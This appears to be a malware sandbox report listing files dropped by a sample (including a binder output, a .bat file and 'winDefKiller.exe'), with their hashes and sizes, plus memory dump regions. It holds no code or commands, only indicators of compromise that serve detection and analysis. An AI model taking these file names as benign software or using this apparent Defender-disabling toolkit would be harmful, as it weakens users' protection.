09b59b8942c1409a03ca4e7f77c6007160af4d557386b766516dba392750869c017d0fd5d6fbbfcbb3e559a70ad42adcb498595df186be180cfc04e921d74320

Download Submit
C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe

Filesize
322KB

MD5
98295714f089f4770b6694a3d7dad576

SHA1
20ea33349b30cbf6924b0b6cebf86108906bfa04

SHA256
f7dbccc1f2e1f29644a236fe6bc615b67c37b2cbd2e14c0b92e09eb3556f90b6

SHA512
4712966205327fa122f63cce7d68a1b6289bca403a249ba7061a4c1018a868f4394ddb70627836fc600500dc90f205476121c1db30d32e2fa0e24e45cd7fe83f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_whgcsvlj.cgn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ddas.exe

Filesize
319KB

MD5
934ccfa6b8ff694e4dac9316f72dd519

SHA1
1de2458399fc36726806719c31454c053f5302e2

SHA256
b38f74cbae0da373708a78367c45000813dbe2a75416ae61c812d8cafce2d1e9

SHA512
2a2f5cddff38ebffeba24b61dfd32d96396d35ee0d373e517827e3a9cf7a7e23f792a1c50ebff62c58e363d87748ca3a1a5751a555e04ae83dd80e1b5074f77e

Download Submit
C:\Users\Admin\AppData\Local\Temp\sa.exe

Filesize
643KB

MD5
a7da6606e77ba117c9faf0a02d3a80b9

SHA1
271a1f743b26dadc2d4e0b2e90cf994577ab45fe

SHA256
8496d9cb7570969ee4d5fbad0f645defde54edf75675b4407c8c803d5a296053

SHA512
c2a7ccc8bb9a13f630171ebb2a5a46dcd586a51384dd34c0496194aeee51aedb20a0929ab7d99f6b6ee53b3aefdecc47b5eccb10b25212b3ab91b5c8607c398c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpDD60.tmp.bat

Filesize
152B

MD5
c532311dab17151d47d1cd8bdb3c38ed

SHA1
df157ac861167caad83699469f471d508772172f

SHA256
c8f756f6292661af2a51aa64d9fd160f302ae7b5606bdb71688d53aae2383e06

SHA512
0e954554b130bd4c28e2ae6a5d50c3374a831b99bdaec422cbdccb261684cdaf453393d02fca07ceb3d2c428662bdb99cdd0048c7520992ecd43fc0e3c7dd6bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe

Filesize
909KB

MD5
cb0f3f61cf776a52d3336eafe5af7c38

SHA1
a2596b80e2b2d43245878b30697b785195072d73

SHA256
679068101335645ece8232b4715d98b1d4fddf5c04ac262133a4bbb3b053ee5f

SHA512
a7ef26fecfb73bc26c5ed81fb7d7a6b10d829cdfa1b3976713043a74a173e9ab6ce399980ceb4284200b74b9b28d7ff520eb392109ebc13a3bad18023b64bc55

Download Submit
memory/1708-89-0x00007FF7B9120000-0x00007FF7B9209000-memory.dmp

Filesize
932KB

Download
memory/2176-14-0x0000029DFCE50000-0x0000029DFCEFE000-memory.dmp

Filesize
696KB

Download
memory/2176-42-0x00007FFA0A780000-0x00007FFA0B241000-memory.dmp

Filesize
10.8MB

Download
memory/2176-15-0x0000029DFCF00000-0x0000029DFCFAE000-memory.dmp

Filesize
696KB

Download
memory/2176-0-0x00007FFA0A783000-0x00007FFA0A785000-memory.dmp

Filesize
8KB

Download
memory/2176-13-0x0000029DE2A30000-0x0000029DE2A38000-memory.dmp

Filesize
32KB

Download
memory/2176-12-0x00007FFA0A780000-0x00007FFA0B241000-memory.dmp

Filesize
10.8MB

Download
memory/2176-11-0x00007FFA0A780000-0x00007FFA0B241000-memory.dmp

Filesize
10.8MB

Download
memory/2176-6-0x0000029DFAB50000-0x0000029DFAB72000-memory.dmp

Filesize
136KB

Download
memory/2356-68-0x00007FFA0A780000-0x00007FFA0B241000-memory.dmp

Filesize
10.8MB

Download
memory/2356-29-0x0000000000610000-0x00000000006B8000-memory.dmp

Filesize
672KB

Download
memory/2356-30-0x00007FFA0A780000-0x00007FFA0B241000-memory.dmp

Filesize
10.8MB

Download
memory/3416-88-0x00007FF7B9120000-0x00007FF7B9209000-memory.dmp

Filesize
932KB

Download
memory/3504-94-0x00000000071C0000-0x0000000007236000-memory.dmp

Filesize
472KB

Download
memory/3504-95-0x0000000007140000-0x00000000071A8000-memory.dmp

Filesize
416KB

Download
memory/3504-96-0x0000000007280000-0x000000000729E000-memory.dmp

Filesize
120KB

Download
memory/3504-97-0x00000000075B0000-0x0000000007642000-memory.dmp

Filesize
584KB

Download
memory/3504-93-0x0000000006270000-0x00000000062D6000-memory.dmp

Filesize
408KB

Download
memory/3504-92-0x0000000006750000-0x0000000006CF4000-memory.dmp

Filesize
5.6MB

Download
memory/3632-70-0x0000000000910000-0x0000000000966000-memory.dmp

Filesize
344KB

Download
memory/3704-79-0x0000000004BF0000-0x0000000004C8C000-memory.dmp

Filesize
624KB

Download
memory/3704-44-0x0000000000220000-0x0000000000232000-memory.dmp

Filesize
72KB

Download
memory/3704-43-0x0000000074E2E000-0x0000000074E2F000-memory.dmp

Filesize
4KB

Download
memory/5088-69-0x00000000001F0000-0x0000000000246000-memory.dmp

Filesize
344KB

Download